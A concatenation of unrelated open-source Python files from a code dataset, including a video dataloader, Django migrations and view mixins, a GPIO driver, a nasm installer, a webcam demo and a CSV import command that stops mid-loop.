train_transforms = transforms.Compose([videotransforms.RandomCrop(224),
videotransforms.RandomHorizontalFlip()])
test_transforms = transforms.Compose([videotransforms.CenterCrop(224)])
task = 'action'
if args.dataset == 'train':
Dataset = VidorPytorchTrain
else:
Dataset = VidorPytorchExtract
if args.where == 'gpu':
anno_rpath = gpu_anno_rpath
video_rpath = gpu_video_rpath
frames_rpath = 'data/Vidor_rgb/JPEGImages/'
else:
anno_rpath = local_anno_rpath
video_rpath = local_video_rpath
frames_rpath = '/home/daivd/PycharmProjects/vidor/Vidor_rgb/JPEGImages/'
if args.split == 'train':
dataset = Dataset(anno_rpath=anno_rpath,
splits=['training'],
video_rpath=video_rpath,
mode=mode,
task=task,
save_dir=save_dir,
frames_rpath=frames_rpath,
transforms=train_transforms,
low_memory=low_memory)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=36,
pin_memory=True)
else:
val_dataset = Dataset(anno_rpath=anno_rpath,
splits=['validation'],
video_rpath=video_rpath,
mode=mode,
save_dir=save_dir,
frames_rpath=frames_rpath,
task=task,
transforms=test_transforms,
low_memory=low_memory)
dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=True, num_workers=36,
pin_memory=True)
for data in dataloader:
# get the inputs
inputs, labels, a, b = data
if inputs.tolist()[0] != -1:
print(inputs.size()) # torch.Size([1, 3, 4, 224, 224])
print(labels.size()) # torch.Size([1, 1, 4])
| StarcoderdataPython |
137403 | <filename>sample_app/tasks/features/environment.py<gh_stars>1-10
import uuid
from django.core.management import call_command
from toolkit.helpers.bdd import setup_test_environment
from toolkit.helpers.utils import snakify
# The scenario param is used behind the scenes
def before_scenario(context, scenario):
setup_test_environment(context, scenario)
call_command('flush', verbosity=0, interactive=False)
call_command('loaddata', 'auth.json')
def after_step(context, step):
# Take a screenshot if the step failed
if step.status == "failed":
file_path = '%s_%s_%s.png' % (snakify(context.scenario),
snakify(step.name),
uuid.uuid4())
context.browser.driver.save_screenshot(file_path)
def after_scenario(context, scenario):
call_command('flush', verbosity=0, interactive=False)
# Close the browser to get a fresh one for each test
context.browser.quit()
context.browser = None # Flush browser from context
context.display.stop() # Closes the virtual display | StarcoderdataPython |
3235832 | # Generated by Django 3.1.13 on 2021-11-09 13:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0106_descrierepage_sistem_structural_observatii'),
]
operations = [
migrations.RemoveField(
model_name='bisericapage',
name='adresa',
),
migrations.RemoveField(
model_name='bisericapage',
name='conservare',
),
migrations.RemoveField(
model_name='bisericapage',
name='datare_an',
),
migrations.RemoveField(
model_name='bisericapage',
name='datare_prin_interval_timp',
),
migrations.RemoveField(
model_name='bisericapage',
name='datare_secol',
),
migrations.RemoveField(
model_name='bisericapage',
name='judet',
),
migrations.RemoveField(
model_name='bisericapage',
name='latitudine',
),
migrations.RemoveField(
model_name='bisericapage',
name='localitate',
),
migrations.RemoveField(
model_name='bisericapage',
name='longitudine',
),
migrations.RemoveField(
model_name='bisericapage',
name='prioritizare',
),
migrations.RemoveField(
model_name='bisericapage',
name='valoare',
),
migrations.AddField(
model_name='conservarepage',
name='total',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='valoarepage',
name='total',
field=models.FloatField(null=True),
),
]
| StarcoderdataPython |
1635614 | <filename>api/serializers/image.py
from rest_framework import serializers
from api.fields import Base64StringField
from election.models import Image
class ImageSerializer(serializers.ModelSerializer):
base64Image = Base64StringField(source='file', allow_null=True)
class Meta:
model = Image
fields = ('id', 'base64Image', 'name')
| StarcoderdataPython |
1790343 | <gh_stars>100-1000
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Downloads and installs nasm in a temporary directory."""
import logging
import os
import shutil
import subprocess
import sys
import tempfile
import urllib.parse
import urllib.request
import zipfile
# pylint: disable=g-import-not-at-top
# pylint: disable=W0403
sys.path.append(os.path.dirname(__file__))
import shell
# pylint: enable=g-import-not-at-top
# pylint: enable=W0403
NASM_ZIP_NAME = 'nasm.zip'
class NasmInstaller:
"""Installs nasm into a temporary directory."""
def __init__(self, installer_url: str, installer_dir: str = None):
"""Initialize the installer instance.
Args:
installer_url: URL to the nasm installer.
installer_dir: Optional path to copy nasm.
"""
self._installer_url = installer_url
if not installer_dir:
self._installer_dir = tempfile.TemporaryDirectory().name
else:
self._installer_dir = installer_dir
# Add nasm installation directory to path.
os.environ['PATH'] = (self._installer_dir + os.path.pathsep +
os.environ['PATH'])
@property
def installer_path(self):
"""Get the path where nasm is going to be installed."""
return self._installer_dir
def install(self):
"""Install nasm to project.
Returns:
True when installed, false otherwise.
Raises:
urllib.error.URLError: If an error occurs while downloading the
installer.
zipfile.BadZipFile: if unzipping fails.
subprocess.CalledProcessError: If failed to set path.
"""
# Download installer.
installer_filename = self._download()
if installer_filename:
# Unzip installer.
self._unzip(installer_filename)
# Add installer to path.
self._check_nasm()
return True
return False
def _download(self) -> str:
"""Download the installer and places into temporary folder.
Returns:
Path to the downloaded installer.
Raises:
urllib.error.URLError: If an error occurs while downloading the
installer.
"""
if not self._installer_url:
return ''
# Create installation directory if doesn't exist.
os.makedirs(self._installer_dir, exist_ok=True)
installer_filename = os.path.join(self._installer_dir, NASM_ZIP_NAME)
with open(installer_filename, 'wb') as installer_file:
logging.info('Copying %s --> %s', self._installer_url, installer_filename)
with urllib.request.urlopen(self._installer_url) as urlfile:
shutil.copyfileobj(urlfile, installer_file)
return installer_filename
def _unzip(self, zip_path: str) -> bool:
"""Unzips nasm package.
Args:
zip_path: Path to the zip file.
Raises:
zipfile.BadZipFile: if unzipping fails.
"""
try:
with zipfile.ZipFile(zip_path) as handle:
for item_info in handle.infolist():
# Remove first folder, so nasm.exe can be found when setting PATH.
target_filename = os.path.join(
self._installer_dir,
os.path.join(*(
os.path.normpath(item_info.filename).split(os.path.sep)[1:])))
# Open the file inside zip and save it on the desired location.
with handle.open(item_info.filename, 'r') as input_file:
os.makedirs(os.path.dirname(target_filename), exist_ok=True)
with open(target_filename, 'wb') as output_file:
output_file.write(input_file.read())
except (zipfile.BadZipFile) as error:
logging.exception('Failed to unzip %s: %s', zip_path, error)
raise
def _check_nasm(self) -> str:
"""Check that nasm runs on cmd.
Raises:
subprocess.CalledProcessError: If failed to run nasm.
"""
try:
shell.run_command('nasm -h')
except subprocess.CalledProcessError as error:
logging.exception('Failed to add nasm to path: %s', error)
raise
| StarcoderdataPython |
171784 | """
Linux Kernel 4.8+ libgpiod
"""
import threading
from datetime import datetime, timedelta
from typing import TYPE_CHECKING, Any, Callable, Dict, Optional
from ...types import ConfigType, PinType
from . import GenericGPIO, InterruptEdge, InterruptSupport, PinDirection, PinPUD
if TYPE_CHECKING:
# pylint: disable=import-error
import gpiod # type: ignore
# Requires libgpiod-devel, libgpiod
REQUIREMENTS = ("gpiod",)
CONFIG_SCHEMA = {
"chip": {"type": "string", "required": False, "default": "/dev/gpiochip0"}
}
class GPIO(GenericGPIO):
"""
Implementation of GPIO class for libgpiod (linux kernel >= 4.8).
"""
INTERRUPT_SUPPORT = InterruptSupport.SOFTWARE_CALLBACK
def setup_module(self) -> None:
# pylint: disable=import-outside-toplevel,import-error
import gpiod
self.io: gpiod = gpiod
self.chip = gpiod.chip(self.config["chip"])
self.pins: Dict[PinType, gpiod.line] = {}
self.interrupt_threads: Dict[PinType, threading.Thread] = {}
self.stop_event = threading.Event()
self.direction_map = {
PinDirection.INPUT: gpiod.line_request.DIRECTION_INPUT,
PinDirection.OUTPUT: gpiod.line_request.DIRECTION_OUTPUT,
}
self.interrupt_edge_map = {
InterruptEdge.RISING: gpiod.line_request.EVENT_RISING_EDGE,
InterruptEdge.FALLING: gpiod.line_request.EVENT_FALLING_EDGE,
InterruptEdge.BOTH: gpiod.line_request.EVENT_BOTH_EDGES,
}
def setup_pin(
self,
pin: PinType,
direction: PinDirection,
pullup: PinPUD,
pin_config: ConfigType,
initial: Optional[str] = None,
) -> None:
"""
Setup a pin as either input or output.
pin: offset to use the gpio line
direction: input or output
pullup: pullup settings are not supported
"""
# Pullup settings are called bias in libgpiod and are only
# available since Linux Kernel 5.5. They are as of now not
# yet part of python3-gpiod.
line: "gpiod.line" = self.chip.get_line(pin)
line_request = self.io.line_request()
line_request.consumer = "mqtt-io"
line_request.request_type = self.direction_map[direction]
line.request(line_request)
if direction == PinDirection.OUTPUT and initial is not None:
line.set_value(1 if initial == "high" else 0)
self.pins[pin] = line
def setup_interrupt_callback(
self,
pin: PinType,
edge: InterruptEdge,
in_conf: ConfigType,
callback: Callable[..., None],
) -> None:
"""
Install interrupt callback function
handle: is returned in the callback function as identification
pin: gpio to watch for interrupts
edge: triggering edge: RISING, FALLING or BOTH
callback: the callback function to be called, when interrupt occurs
bouncetime: minimum time between two interrupts
"""
line_request = self.io.line_request()
line_request.consumer = "mqtt-io"
line_request.request_type = self.interrupt_edge_map[edge]
bouncetime: int = in_conf["bouncetime"]
int_thread = InterruptThread(
self.chip, pin, line_request, callback, bouncetime, self.stop_event
)
int_thread.start()
self.interrupt_threads[pin] = int_thread
def get_interrupt_value(self, pin: PinType, *args: Any, **kwargs: Any) -> bool:
# We established the pin's value in the InterruptThread, so we just give it back
pin_value: bool = kwargs["pin_value"]
return pin_value
def set_pin(self, pin: PinType, value: bool) -> None:
self.pins[pin].set_value(value)
def get_pin(self, pin: PinType) -> bool:
return bool(self.pins[pin].get_value())
def cleanup(self) -> None:
self.stop_event.set()
for thread in self.interrupt_threads.values():
thread.join(timeout=10)
class InterruptThread(threading.Thread):
"""
Thread that waits on interrupt events for a given pin, then calls the callback.
"""
def __init__(
self,
chip: "gpiod.chip",
pin: PinType,
line_request: "gpiod.line_request",
callback: Callable[..., None],
bouncetime: int,
stop_event: threading.Event,
):
super().__init__()
self.daemon = True
self.pin = pin
self.line: "gpiod.line" = chip.get_line(self.pin)
self.line.release()
self.line.request(line_request)
self.callback = callback
self.bouncetime = timedelta(milliseconds=bouncetime)
self.stop_event = stop_event
def run(self) -> None:
# pylint: disable=import-outside-toplevel,import-error
import gpiod
previous_event_time = datetime.now()
while not self.stop_event.is_set():
if not self.line.event_wait(timedelta(seconds=2)):
continue
event: gpiod.line_event = self.line.event_read()
now = datetime.now()
if now - previous_event_time < self.bouncetime:
continue
previous_event_time = now
pin_value = None
if event.event_type == gpiod.line_request.EVENT_RISING_EDGE:
pin_value = True
elif event.event_type == gpiod.line_request.EVENT_FALLING_EDGE:
pin_value = False
if pin_value is None:
# Poll the pin for its value :(
pin_value = bool(self.line.get_value())
self.callback(pin_value=pin_value)
| StarcoderdataPython |
1771910 | <reponame>dcmvdbekerom/exojax<filename>src/exojax/plot/__init__.py
__all__ = []
__version__ = "1.0.0"
__uri__ = ""
__author__ = "<NAME> and collaborators"
__email__ = "<EMAIL>"
__license__ = ""
__description__ = "plotting modules in exojax"
from exojax.plot.atmplot import (
plottau,
plotcf,
)
| StarcoderdataPython |
3315765 | import torch
from .mlp_kernel import MLPKernel
from .rbf_net import RBFNetKernel
| StarcoderdataPython |
1687447 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, <NAME> and contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer. Redistributions in binary
# form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with
# the distribution
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
from django.utils.translation import ugettext_lazy as _
from organizations.models import Organization
from organizations.models import OrganizationUser
class OrganizationMixin(object):
"""Mixin used like a SingleObjectMixin to fetch an organization"""
org_model = Organization
org_context_name = 'organization'
def get_org_model(self):
return self.org_model
def get_context_data(self, **kwargs):
kwargs.update({self.org_context_name: self.get_organization()})
return super(OrganizationMixin, self).get_context_data(**kwargs)
def get_object(self):
if hasattr(self, 'organization'):
return self.organization
organization_pk = self.kwargs.get('organization_pk', None)
self.organization = get_object_or_404(self.get_org_model(), pk=organization_pk)
return self.organization
get_organization = get_object # Now available when `get_object` is overridden
class OrganizationUserMixin(OrganizationMixin):
"""Mixin used like a SingleObjectMixin to fetch an organization user"""
user_model = OrganizationUser
org_user_context_name = 'organization_user'
def get_user_model(self):
return self.user_model
def get_context_data(self, **kwargs):
kwargs = super(OrganizationUserMixin, self).get_context_data(**kwargs)
kwargs.update({self.org_user_context_name: self.object,
self.org_context_name: self.object.organization})
return kwargs
def get_object(self):
""" Returns the OrganizationUser object based on the primary keys for both
the organization and the organization user.
"""
if hasattr(self, 'organization_user'):
return self.organization_user
organization_pk = self.kwargs.get('organization_pk', None)
user_pk = self.kwargs.get('user_pk', None)
self.organization_user = get_object_or_404(
self.get_user_model().objects.select_related(),
user__pk=user_pk, organization__pk=organization_pk)
return self.organization_user
class MembershipRequiredMixin(object):
"""This mixin presumes that authentication has already been checked"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
self.organization = self.get_organization()
if not self.organization.is_member(request.user) and not \
request.user.is_superuser:
raise PermissionDenied(_("Wrong organization"))
return super(MembershipRequiredMixin, self).dispatch(request, *args,
**kwargs)
class AdminRequiredMixin(object):
"""This mixin presumes that authentication has already been checked"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
self.organization = self.get_organization()
if not self.organization.is_admin(request.user) and not \
request.user.is_superuser:
raise PermissionDenied(_("Sorry, admins only"))
return super(AdminRequiredMixin, self).dispatch(request, *args,
**kwargs)
class OwnerRequiredMixin(object):
"""This mixin presumes that authentication has already been checked"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
self.organization = self.get_organization()
# if self.organization.owner.organization_user.user != request.user and not request.user.is_superuser:
if self.organization.owner.organization_user.user != request.user:
if not request.user.is_superuser:
raise PermissionDenied(_("You are not the organization owner"))
return super(OwnerRequiredMixin, self).dispatch(request, *args, **kwargs)
| StarcoderdataPython |
1699807 | from django.urls import path
from .views import (
CustomLoginView,
DashboardView,
SingleApplicationView,
)
urlpatterns = [
path('login/', CustomLoginView.as_view(), name='login'),
path('', DashboardView.as_view(), name='dashboard'),
path('<int:pk>/', SingleApplicationView.as_view())
]
| StarcoderdataPython |
81256 | # -*- coding: utf-8 -*-
#
# Contributhon 2020 documentation build configuration file
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
#extensions = ['otcdocstheme']
# openstackdocstheme options
#repository_name = 'opentelekomcloud/otcdocstheme'
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'2020 Contributhon Documentation'
copyright = u'2020 Contributhon Contributors'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'otcdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# To use the API Reference sidebar dropdown menu,
# uncomment the html_theme_options parameter. The theme
# variable, sidebar_dropdown, should be set to `api_ref`.
# Otherwise, the list of links for the User and Ops docs
# appear in the sidebar dropdown menu.
#html_theme_options = {'show_other_versions': True}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static/css']
#---sphinx-themes-----
from jupyter_sphinx_theme import *
init_theme()
| StarcoderdataPython |
1743034 | <gh_stars>1-10
from keep_current_storage.shared import use_case as uc
from keep_current_storage.shared import response_object as res
class DocumentListUseCase(uc.UseCase):
def __init__(self, repo):
self.repo = repo
def process_request(self, request_object):
domain_document = self.repo.list(filters=request_object.filters)
return res.ResponseSuccess(domain_document)
class DocumentInsertUseCase(uc.UseCase):
def __init__(self, repo):
self.repo = repo
def process_request(self, request_object):
self.repo.insert_document(request_object.document)
return res.ResponseSuccess() | StarcoderdataPython |
90255 | from embedding_encoder.core import EmbeddingEncoder
__all__ = ["EmbeddingEncoder"]
| StarcoderdataPython |
194111 | from .compose import Compose
from .formating import Reformat
# from .loading import LoadAnnotations, LoadImageFromFile, LoadProposals
from .loading import *
from .test_aug import DoubleFlip
from .preprocess import Preprocess, Voxelization, AssignLabel, AssignTarget
__all__ = [
"Compose",
"to_tensor",
"ToTensor",
"ImageToTensor",
"ToDataContainer",
"Transpose",
"Collect",
"LoadImageAnnotations",
"LoadImageFromFile",
"LoadProposals",
"PhotoMetricDistortion",
"Preprocess",
"Voxelization",
"AssignTarget",
"AssignLabel",
"AssignTarget",
]
| StarcoderdataPython |
29567 | """
.. module:: django_core_models.locations.urls
:synopsis: django_core_models locations application urls module
django_core_models *locations* application urls module.
"""
from __future__ import absolute_import
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^addresses/$',
views.AddressList.as_view(),
name='address-list'),
url(r'^addresses/(?P<pk>[0-9]+)/$',
views.AddressDetail.as_view(),
name='address-detail'),
url(r'^address-types/$',
views.AddressTypeList.as_view(),
name='address-type-list'),
url(r'^address-types/(?P<pk>[0-9]+)/$',
views.AddressTypeDetail.as_view(),
name='address-type-detail'),
url(r'^cities/$',
views.CityList.as_view(),
name='city-list'),
url(r'^cities/(?P<pk>[0-9]+)/$',
views.CityDetail.as_view(),
name='city-detail'),
url(r'^countries/$',
views.CountryList.as_view(),
name='country-list'),
url(r'^countries/(?P<pk>[0-9]+)/$',
views.CountryDetail.as_view(),
name='country-detail'),
url(r'^distance-units/$', views.DistanceUnitList.as_view(),
name='distance-unit-list'),
url(r'^distance-units/(?P<pk>[0-9]+)/$',
views.DistanceUnitDetail.as_view(),
name='distance-unit-detail'),
url(r'^geographic-locations/$',
views.GeographicLocationList.as_view(),
name='geographic-location-list'),
url(r'^geographic-locations/(?P<pk>[0-9]+)/$',
views.GeographicLocationDetail.as_view(),
name='geographic-location-detail'),
url(r'^geographic-location-types/$',
views.GeographicLocationTypeList.as_view(),
name='geographic-location-type-list'),
url(r'^geographic-location-types/(?P<pk>[0-9]+)/$',
views.GeographicLocationTypeDetail.as_view(),
name='geographic-location-type-detail'),
url(r'^language-types/$',
views.LanguageTypeList.as_view(),
name='language-type-list'),
url(r'^language-types/(?P<pk>[0-9]+)/$',
views.LanguageTypeDetail.as_view(),
name='language-type-detail'),
url(r'^languages/$',
views.LanguageList.as_view(),
name='language-list'),
url(r'^languages/(?P<pk>[0-9]+)/$',
views.LanguageDetail.as_view(),
name='language-detail'),
url(r'^timezone-types/$',
views.TimezoneTypeList.as_view(),
name='timezone-type-list'),
url(r'^timezone-types/(?P<pk>[0-9]+)/$',
views.TimezoneTypeDetail.as_view(),
name='timezone-type-detail'),
url(r'^timezones/$',
views.TimezoneList.as_view(),
name='timezone-list'),
url(r'^timezones/(?P<pk>[0-9]+)/$',
views.TimezoneDetail.as_view(),
name='timezone-detail'),
url(r'^proninces/$',
views.ProvinceList.as_view(),
name='province-list'),
url(r'^proninces/(?P<pk>[0-9]+)/$',
views.ProvinceDetail.as_view(),
name='province-detail'),
url(r'^states/$',
views.StateList.as_view(),
name='state-list'),
url(r'^states/(?P<pk>[0-9]+)/$',
views.StateDetail.as_view(),
name='state-detail'),
]
| StarcoderdataPython |
3291282 | <gh_stars>0
import tkinter as tk # For tkinter Widgets
import os # For access to os properties such as path
from tkinter import ttk # Themed tkinter for beautiful interfaces
from tkinter import filedialog # Tkinter file dialog interface.
from tkinter import scrolledtext as scr # Scrolled Text Widget
# TODO: Recreate into a GUI class
win = tk.Tk()
win.minsize(200, 200) # Allows us to hold the application at a definite size
win.resizable(0,0) # Prevents increasing the size of the widget unless forced
win.title("Test Add Button") # Could be changed on any 'Test Commit'
"""Display Box is Global cause of it's accessibility on various levels"""
# TODO: Rephrase into a modular program
display_box = scr.ScrolledText(win, width=60, height=10)
display_box.grid(column=1, row=1, sticky=tk.NSEW)
"""Folder list is an actual folder list"""
folder_list = []
# This function is to enable the user add folders to be accessed
def add_folder():
""""This function is to enable the user add folders to be accessed"""
# some highlighted variables are for test purposes only
""" I was finally able to make it default to HOME anytime by using 'tilde' '~' in 'initial dir'"""
folder_variable = filedialog.askdirectory(parent=win, initialdir='~', title='Select your Music and Videos folder')
## print(folder_variable)
# display_box.insert(tk.INSERT, folder_variable)
folder_list.append(folder_variable)
# Button = tk.Button(win, text="[]".format(folder_name), width=10, command=display_folder_contents)
# Button.grid(column=4, row=k)
# k += 1
## print(folder_list)
## display_box.insert(tk.INSERT, folder_list)
def display_folder_contents():
j = 0
while j<len(folder_list):
selected_folder = os.listdir(folder_list[j])
j = j + 1
for i in selected_folder:
# TODO: Fix the Display Box Output and organize it.
# This activity of displaying the output into an scrolled text widget
# comes out warped
## 'display_box.insert(tk.INSERT, i, "\n")'
print(i, )
# TODO: Fix the sub_folder selction and redirect output accordingly
# actual_file_list = selected_folder[j]
# print("The Contents of {} are: \n{}\n".format(selected_folder, actual_file_list))
# sprint(actual_file_list, "\n")
# TODO: Consider deleting these final lines
#for i in files:
# display_box.insert(tk.INSERT, i)
# print(i, "\n")
""" Two test buttons created for the test processes. """
add_button = ttk.Button(win, text="Add Folder", command = add_folder)
add_button.grid(column=0, row=1, sticky=tk.N)
view_button = ttk.Button(win, text="View Files", command = display_folder_contents)
view_button.grid(column=0, row=1, sticky=tk.S)
# TODO: Mainloop is just for the test phase
win.mainloop()
"""
if __name__ == '__main__': # This prototype would be used instead.
win.mainloop()
"""
# TODO: Rephrase everything into modules at the end of testing phase. | StarcoderdataPython |
1665279 | <gh_stars>1-10
#!/usr/bin/env python3
from termcolor import cprint
import argparse
import os
from xcanalyzer.xcodeproject.parsers import XcProjectParser
from xcanalyzer.xcodeproject.generators import OccurrencesReporter
from xcanalyzer.xcodeproject.exceptions import XcodeProjectReadException
from xcanalyzer.language.models import SwiftTypeType, ObjcTypeType
# --- Arguments ---
argument_parser = argparse.ArgumentParser(description="List all types that are unused in the project.")
# Project folder argument
argument_parser.add_argument('path',
help='Path of the folder containing your `.xcodeproj` folder.')
# App name
argument_parser.add_argument('app',
help='Name of the iOS app target.')
# Verbose
argument_parser.add_argument('-v', '--verbose',
dest='verbose',
action='store_true',
help='Verbose display.')
# Display files
argument_parser.add_argument('-d', '--display-files',
dest='display_files',
action='store_true',
help='Display files mode.')
# --- Parse arguments ---
args = argument_parser.parse_args()
# Argument: path => Remove ending slashes from path
path = args.path
while path and path[-1] == os.path.sep:
path = path[:-1]
# Xcode code project reader
xcode_project_reader = XcProjectParser(path, verbose=args.verbose)
# Loading the project
try:
xcode_project_reader.load()
# Parse Swift files
xcode_project_reader.parse_swift_files()
# Parse Objective-C files (always because Swift extension can be of objc types)
xcode_project_reader.parse_objc_files()
except XcodeProjectReadException as e:
print("An error occurred when loading Xcode project: {}".format(e.message))
exit()
# App target
app_target = xcode_project_reader.xc_project.target_with_name(args.app)
if not app_target:
raise ValueError("No app target found with name '{}'.".format(args.app))
# Find occurrences
swift_types = app_target.swift_types_dependencies_filtered(type_not_in={SwiftTypeType.EXTENSION})
objc_types = app_target.objc_types_dependencies_filtered(type_not_in={ObjcTypeType.CATEGORY, ObjcTypeType.CONSTANT}) # temporary exclude constants from objc types
type_occurrences_set = xcode_project_reader.find_type_occurrences_from_files(
# swift_types | objc_types,
objc_types,
from_target=app_target)
# Print occurrences for each type
occurrences_reporter = OccurrencesReporter()
occurrences_reporter.print_occurrences_of_multiple_types_in_files(type_occurrences_set, args.display_files)
# TODO:
# save/load cache for type occurrences
# report print really dead types: manage a mode:
# display all
# display only types with 0 outside occurrence
# display only types with exactly 1 inside occurrence (the declaration)
# ...
| StarcoderdataPython |
1675334 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class PoolEndpointConfiguration(Model):
"""The endpoint configuration for a pool.
:param inbound_nat_pools: A list of inbound NAT pools that can be used to
address specific ports on an individual compute node externally. The
maximum number of inbound NAT pools per Batch pool is 5. If the maximum
number of inbound NAT pools is exceeded the request fails with HTTP status
code 400.
:type inbound_nat_pools: list[~azure.batch.models.InboundNATPool]
"""
_validation = {
'inbound_nat_pools': {'required': True},
}
_attribute_map = {
'inbound_nat_pools': {'key': 'inboundNATPools', 'type': '[InboundNATPool]'},
}
def __init__(self, inbound_nat_pools):
super(PoolEndpointConfiguration, self).__init__()
self.inbound_nat_pools = inbound_nat_pools
| StarcoderdataPython |
1791183 | <filename>10codons.py
#!/usr/bin/env python3
# Define Variables
dna = 'ATAGCGAATATCTCTCATGAGAGGGAA'
s = len(dna)
# Loop
for i in range(0,s,3):
print(dna[i:i+3])
print('End of Reading Frame')
| StarcoderdataPython |
3380522 | <reponame>CompassMentis/mosaic_tiles
class Settings:
screen_width = 1800
screen_height = 950
tile_width = 40
tile_height = tile_width
factories_centre = 360, 350
factories_circle_radius = 250
factory_circle_radius = 80
spacing = 10
grid_colour = 128, 128, 128
active_grid_colour = 255, 128, 128
selected_grid_colour = 50, 255, 50
grid_line_width = 2
opponent_area_location = 1300, 50
player_area_location = 400, 450
player_area_multiplier = 1.8
area_height = (5 + 2) * tile_height + spacing
pattern_area_width = (5 + 0.2) * tile_width + spacing
floor_tile_scores_font_size = 24
floor_tile_scores_spacing = 8
floor_tile_scores_colour = 90, 90, 90 | StarcoderdataPython |
3244143 | <gh_stars>0
import cv2
def fool_proof_webcam():
# Create a named window
# This window will be called by its name, hence the variable
window_name = "Live Video Feed"
cv2.namedWindow(window_name)
# Get first available camera : index=0 (int)
cap = cv2.VideoCapture(0)
# Check if video capturing was initialized
# Fool-proof method, yet not necessary
# frame : check if a frame has been grabbed (boolean)
# frame : frame from camera (np.ndarray)
if cap.isOpened():
ret, frame = cap.read()
else:
ret = False
while ret:
ret, frame = cap.read()
# Convert frame from BGR to Grayscale
output = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow(window_name, output)
# Wait for key event at each millisecond (delay = 1)
# waitKey returns ord() of pressed key
# 27: ASCII code for ESC = ord(ESC)
if cv2.waitKey(1) == 27:
break
# Destroy window and release camera
cv2.destroyWindow(window_name)
cap.release()
def simple_webcam():
# Capture
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
cv2.imshow("Webcam", frame)
# Update each 30 ms
# Retrieve 8 least significant bits from code (0-255)
k = cv2.waitKey(30) & 0xFF
# Loop will only break by pressing 'q'
if k == ord("q"):
print(k)
break
cv2.destroyAllWindows()
cap.release()
if __name__ == "__main__":
fool_proof_webcam()
simple_webcam()
| StarcoderdataPython |
3347731 | <reponame>caoxiaoyue/PyAutoFit
import pytest
from autofit.database.migration import Step, Migrator
@pytest.fixture(
name="step_1"
)
def make_step_1():
return Step(
"INSERT INTO test (id) VALUES (1)"
)
@pytest.fixture(
name="step_2"
)
def make_step_2():
return Step(
"INSERT INTO test (id) VALUES (2)"
)
@pytest.fixture(
name="migrator"
)
def make_migrator(
step_1,
step_2
):
return Migrator(
step_1,
step_2
)
@pytest.fixture(
name="revision_1"
)
def make_revision_1(migrator):
return list(
migrator.revisions
)[0]
@pytest.fixture(
name="revision_2"
)
def make_revision_2(migrator):
return list(
migrator.revisions
)[1]
| StarcoderdataPython |
4802679 | <gh_stars>1-10
from collections import defaultdict
import time
from django.core.management.base import BaseCommand
import csv
import shapefile
class CSVImportCommand(BaseCommand):
help = 'Import data from a CSV file'
def __init__(self, skip_header=False, encoding=None):
self.skip_header = skip_header
self.encoding = encoding
def add_arguments(self, parser):
parser.add_argument('csv_file', type=str)
def process_row(self, row):
pass
def handle(self, *args, **options):
csv_file_name = options.get('csv_file')
if csv_file_name:
with open(
csv_file_name,
newline='', encoding=self.encoding) as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
if self.skip_header:
next(reader)
outcome_counts = defaultdict(int)
start_time = time.time()
for count, row in enumerate(reader):
